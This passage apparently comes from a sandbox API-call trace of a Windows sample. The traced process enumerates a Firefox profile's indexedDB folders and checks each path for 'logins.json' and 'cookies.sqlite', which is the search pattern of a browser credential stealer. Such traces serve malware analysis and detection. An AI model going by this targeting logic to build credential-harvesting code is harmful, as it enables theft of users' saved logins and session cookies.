HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.213] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.213] GetProcessHeap () returned 0x8e0000 [0161.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x91b1b0 [0161.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.213] VirtualQuery (in: lpAddress=0x91b0b0, lpBuffer=0x2deb00, dwLength=0x1c | out: lpBuffer=0x2deb00*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.213] GetProcessHeap () returned 0x8e0000 [0161.213] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b0b0 | out: hHeap=0x8e0000) returned 1 [0161.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.213] lstrlenW (lpString="") returned 0 [0161.213] GetProcessHeap () returned 0x8e0000 [0161.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x91b2d8 [0161.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 140 [0161.213] lstrlenW (lpString="\\*.*") returned 4 [0161.213] GetProcessHeap () returned 0x8e0000 [0161.213] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91b400 [0161.213] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*" [0161.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x2de8e0 | out: lpFindFileData=0x2de8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x917ca8, dwReserved1=0x917ca8, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0161.213] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.213] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de8e0 | out: lpFindFileData=0x2de8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x917ca8, dwReserved1=0x917ca8, cFileName="..", cAlternateFileName="")) returned 1 [0161.213] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.213] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.213] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de8e0 | out: lpFindFileData=0x2de8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb70ff8d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb70ff8d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x917ca8, dwReserved1=0x917ca8, cFileName="..", cAlternateFileName="")) returned 0 [0161.213] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.214] VirtualQuery (in: lpAddress=0x91b400, lpBuffer=0x2de894, dwLength=0x1c | out: lpBuffer=0x2de894*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b400 | out: hHeap=0x8e0000) returned 1 [0161.214] VirtualQuery (in: lpAddress=0x91b2d8, lpBuffer=0x2de894, dwLength=0x1c | out: lpBuffer=0x2de894*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2d8 | out: hHeap=0x8e0000) returned 1 [0161.214] VirtualQuery (in: lpAddress=0x91b1b0, lpBuffer=0x2deb0c, dwLength=0x1c | out: lpBuffer=0x2deb0c*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1b0 | out: hHeap=0x8e0000) returned 1 [0161.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.214] lstrlenW (lpString="\\") returned 1 [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x91b0b0 [0161.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.214] lstrlenW (lpString="818200132aebmoouht") returned 18 [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x91b1b0 [0161.214] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht" [0161.214] VirtualQuery (in: lpAddress=0x91b0b0, lpBuffer=0x2deb00, dwLength=0x1c | out: lpBuffer=0x2deb00*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b0b0 | out: hHeap=0x8e0000) returned 1 [0161.214] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="logins.json") returned 0x0 [0161.214] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht", lpSrch="cookies.sqlite") returned 0x0 [0161.214] VirtualQuery (in: lpAddress=0x91b1b0, lpBuffer=0x2deb0c, dwLength=0x1c | out: lpBuffer=0x2deb0c*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.214] GetProcessHeap () returned 0x8e0000 [0161.214] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1b0 | out: hHeap=0x8e0000) returned 1 [0161.214] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb58 | out: lpFindFileData=0x2deb58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 1 [0161.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.214] lstrlenW (lpString="\\") returned 1 [0161.214] GetProcessHeap () returned 0x8e0000 [0161.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf6) returned 0x91b0b0 [0161.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0161.215] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x128) returned 0x91b1b0 [0161.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0161.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0161.215] VirtualQuery (in: lpAddress=0x91b0b0, lpBuffer=0x2deb00, dwLength=0x1c | out: lpBuffer=0x2deb00*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b0b0 | out: hHeap=0x8e0000) returned 1 [0161.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="logins.json") returned 0x0 [0161.215] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.215] VirtualQuery (in: lpAddress=0x91b1b0, lpBuffer=0x2deb0c, dwLength=0x1c | out: lpBuffer=0x2deb0c*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2d000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1b0 | out: hHeap=0x8e0000) returned 1 [0161.215] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2deb58 | out: lpFindFileData=0x2deb58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb81a92d0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa0000, dwReserved0=0x2a, dwReserved1=0x0, cFileName="818200132aebmoouht.sqlite", cAlternateFileName="818200~1.SQL")) returned 0 [0161.215] FindClose (in: hFindFile=0x8f9b80 | out: hFindFile=0x8f9b80) returned 1 [0161.215] VirtualQuery (in: lpAddress=0x917cc0, lpBuffer=0x2deb0c, dwLength=0x1c | out: lpBuffer=0x2deb0c*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x31000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917cc0 | out: hHeap=0x8e0000) returned 1 [0161.215] VirtualQuery (in: lpAddress=0x917ba8, lpBuffer=0x2deb0c, dwLength=0x1c | out: lpBuffer=0x2deb0c*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x31000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917ba8 | out: hHeap=0x8e0000) returned 1 [0161.215] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.215] lstrlenW (lpString="\\") returned 1 [0161.215] GetProcessHeap () returned 0x8e0000 [0161.215] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x917ba8 [0161.215] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.216] lstrlenW (lpString="idb") returned 3 [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925ce0 [0161.216] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.216] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.216] VirtualQuery (in: lpAddress=0x917ba8, lpBuffer=0x2ded78, dwLength=0x1c | out: lpBuffer=0x2ded78*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x31000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917ba8 | out: hHeap=0x8e0000) returned 1 [0161.216] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="logins.json") returned 0x0 [0161.216] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpSrch="cookies.sqlite") returned 0x0 [0161.216] VirtualQuery (in: lpAddress=0x925ce0, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ce0 | out: hHeap=0x8e0000) returned 1 [0161.216] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dedd0 | out: lpFindFileData=0x2dedd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 0 [0161.216] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0161.216] VirtualQuery (in: lpAddress=0x925be0, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925be0 | out: hHeap=0x8e0000) returned 1 [0161.216] VirtualQuery (in: lpAddress=0x925ae8, lpBuffer=0x2ded84, dwLength=0x1c | out: lpBuffer=0x2ded84*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.216] GetProcessHeap () returned 0x8e0000 [0161.216] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925ae8 | out: hHeap=0x8e0000) returned 1 [0161.216] VirtualQuery (in: lpAddress=0x9259f0, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, 